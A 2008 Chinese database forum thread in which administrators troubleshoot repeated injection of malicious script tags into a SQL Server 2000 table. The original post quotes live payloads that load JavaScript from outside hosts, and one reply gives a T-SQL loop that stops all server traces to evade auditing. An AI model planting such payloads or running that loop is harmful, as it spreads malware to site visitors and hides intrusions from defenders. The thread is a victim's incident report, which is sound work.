MSSQL2000被多次注入JS脚本,SQL探查器为什么没有记录?

isjoe 2008-05-30 04:28:41
情况简介:

公司服务器一台,sql2000服务,近几天固定的一个表总是被插入js脚本,每次插入的js有时候不同有时候相同,
我们使用webservices访问服务器和sql,其中会有编辑该表的窗口(胖客户端),但是我们的webservices从来不
传递SQL语句,只传递数据,服务器端根据数据的状态,拼装SQL执行,请问一般的SQL注入能注入WebServices吗?

还有我们打开sql探查器后,数据被注入js,但是探查器没有相关记录,搜索相关的插入内容没有找到,也没有任何对
该表的Update语句,但是js被写入了表中(列:Text类型),每次总是这个列,插入的内容会有变化.还有我们的两个网站
和WebSErvies共用同一数据库,是不是来自网站的注入?探查器为什么没有记录呢?我们采用默认跟踪模板.

我们曾经给该表添加了一个触发器,触发器显示该表有Update操作,但是无法得到太多的信息了,通过表被插入的情况
sql应该是这样的 update 名表 set 列名=列名+'js内容'..........

js脚本有:</title><script src=http://1.cool0.biz/1.js></script><!--"></title>
</title><scriptt src=http://%6b%6b%36%2e%75%73/1.js></script>
等等好多样子(我改用中文全角写得)

多谢指点!
...全文
345 17 打赏 收藏 转发到动态 举报
写回复
用AI写文章
17 条回复
切换为时间正序
请发表友善的回复…
发表回复
isjoe 2008-06-02
  • 打赏
  • 举报
回复
最后,在该表中添加了一个触发器,要是有js就再改回来......先这样吧
isjoe 2008-06-02
  • 打赏
  • 举报
回复
自己再Up一次.请教
isjoe 2008-05-31
  • 打赏
  • 举报
回复
我也觉得是不是服务器有点问题了,IIs日志看了,没有看出什么.
我sql水平一般..大家还有什么好的建议.
spgoal 2008-05-30
  • 打赏
  • 举报
回复
我也尝试用一些注入检测软件来检测网站,但也没发现有可注入的地方,也许我不太会用那个软件,叫什么NBXXX
spgoal 2008-05-30
  • 打赏
  • 举报
回复
用log_explorer可以看到修改行的信息,我的网站也给注入了,修改了几次代码都无效,我现在开始怀疑是不是SQL SERVER 2000本身有漏洞,或者是服务器中毒了
jhwcd 2008-05-30
  • 打赏
  • 举报
回复
在IIS日志文件里查查呀!
hery2002 2008-05-30
  • 打赏
  • 举报
回复
貌似是先通过 sp_trace_setstatus 将当前的trace状态设为停止,
然后调用 sp_trace_setfilter 过滤掉他自己的应用,
然后在跟踪器里面就跟踪不到,
吃饭先!
原文刚才找了一下,没有找到了~ :(
而不是直接暂停方式~
boigel 2008-05-30
  • 打赏
  • 举报
回复
关注。留个记号
isjoe 2008-05-30
  • 打赏
  • 举报
回复
[Quote=引用 7 楼 perfectaction 的回复:]
引用 6 楼 hery2002 的回复:
引用 5 楼 perfectaction 的回复:
给我地址,我注入下试试

吼吼,
貌似有种方式可以在探查器里面屏蔽,
忘了,晚上测试一下看看 :)


莫非是:


SQL code declare @t_count int
set @t_count=1
while exists(SELECT * FROM fn_trace_geteventinfo(@t_count))
begin
exec sp_trace_setstatus @t_count,0
set @t_count=@t_count+1
end
[/Quote]

偶看不懂啊.............
nzperfect 2008-05-30
  • 打赏
  • 举报
回复
 declare @t_count int 
set @t_count=1
while exists(SELECT * FROM ::fn_trace_geteventinfo(@t_count))
begin
exec sp_trace_setstatus @t_count,0
set @t_count=@t_count+1
end
nzperfect 2008-05-30
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 hery2002 的回复:]
引用 5 楼 perfectaction 的回复:
给我地址,我注入下试试

吼吼,
貌似有种方式可以在探查器里面屏蔽,
忘了,晚上测试一下看看 :)
[/Quote]

莫非是:

 declare @t_count int 
set @t_count=1
while exists(SELECT * FROM fn_trace_geteventinfo(@t_count))
begin
exec sp_trace_setstatus @t_count,0
set @t_count=@t_count+1
end
hery2002 2008-05-30
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 perfectaction 的回复:]
给我地址,我注入下试试
[/Quote]
吼吼,
貌似有种方式可以在探查器里面屏蔽,
忘了,晚上测试一下看看 :)
nzperfect 2008-05-30
  • 打赏
  • 举报
回复
给我地址,我注入下试试
hery2002 2008-05-30
  • 打赏
  • 举报
回复
.....
isjoe 2008-05-30
  • 打赏
  • 举报
回复
我现在就是搞不清,怎么注入的,我们使用webservics,不传递sql语句,
难道是网站被黑了。。。。没什么证据,为什么总改同一个表的同一个字段。。。
isjoe 2008-05-30
  • 打赏
  • 举报
回复
[Quote=引用 1 楼 Limpire 的回复:]
注入之前开跟踪,注入后肯定是可以跟踪到的。
[/Quote]

我开了一夜了.......触发器显示昨天晚上、凌晨都有update操作,可是探查器确没有记录,郁闷死了
探查器只有该表的select语句。其它没有了
Limpire 2008-05-30
  • 打赏
  • 举报
回复
注入之前开跟踪,注入后肯定是可以跟踪到的。

22,209

社区成员

发帖
与我相关
我的任务
社区描述
MS-SQL Server 疑难问题
社区管理员
  • 疑难问题社区
  • 尘觉
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧